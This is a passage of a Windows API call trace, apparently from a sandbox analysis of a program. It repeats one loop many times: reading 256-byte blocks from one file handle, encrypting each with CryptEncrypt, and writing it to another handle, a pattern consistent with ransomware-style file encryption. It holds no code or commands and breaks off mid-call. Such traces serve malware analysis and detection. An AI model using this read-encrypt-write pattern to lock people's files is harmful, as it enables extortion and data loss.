returned 1 [0144.792] GetLastError () returned 0x0 [0144.792] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.792] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.792] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.792] GetLastError () returned 0x0 [0144.792] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.792] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.793] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.793] GetLastError () returned 0x0 [0144.793] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.793] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.793] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.793] GetLastError () returned 0x0 [0144.793] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.793] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.793] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.793] GetLastError () returned 0x0 [0144.793] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.793] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.793] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.793] GetLastError () returned 0x0 [0144.793] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.793] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.793] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.793] GetLastError () returned 0x0 [0144.793] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.793] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.793] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.793] GetLastError () returned 0x0 [0144.793] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.793] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.793] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.793] GetLastError () returned 0x0 [0144.793] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.794] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.794] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.794] GetLastError () returned 0x0 [0144.794] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.794] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.794] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.794] GetLastError () returned 0x0 [0144.794] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.794] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.794] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.794] GetLastError () returned 0x0 [0144.794] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.794] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.794] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.794] GetLastError () returned 0x0 [0144.794] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.794] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.794] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.794] GetLastError () returned 0x0 [0144.794] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.794] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.794] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.794] GetLastError () returned 0x0 [0144.794] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.794] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.795] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.795] GetLastError () returned 0x0 [0144.795] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.795] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.795] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.795] GetLastError () returned 0x0 [0144.795] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.795] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.795] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.795] GetLastError () returned 0x0 [0144.795] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.795] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.795] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.795] GetLastError () returned 0x0 [0144.795] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.795] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.795] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.795] GetLastError () returned 0x0 [0144.795] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.795] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.795] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.795] GetLastError () returned 0x0 [0144.795] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.795] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.795] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.795] GetLastError () returned 0x0 [0144.795] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.796] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.796] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.796] GetLastError () returned 0x0 [0144.796] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.796] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.796] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.796] GetLastError () returned 0x0 [0144.796] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.796] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.796] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.796] GetLastError () returned 0x0 [0144.796] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.796] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.796] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.796] GetLastError () returned 0x0 [0144.796] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.796] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.796] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.796] GetLastError () returned 0x0 [0144.796] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.796] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.796] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.796] GetLastError () returned 0x0 [0144.796] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.796] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.796] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.797] GetLastError () returned 0x0 [0144.797] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.797] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.797] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.797] GetLastError () returned 0x0 [0144.797] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.797] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.797] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.797] GetLastError () returned 0x0 [0144.797] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.797] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.797] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.797] GetLastError () returned 0x0 [0144.797] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.797] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.797] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.797] GetLastError () returned 0x0 [0144.797] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: 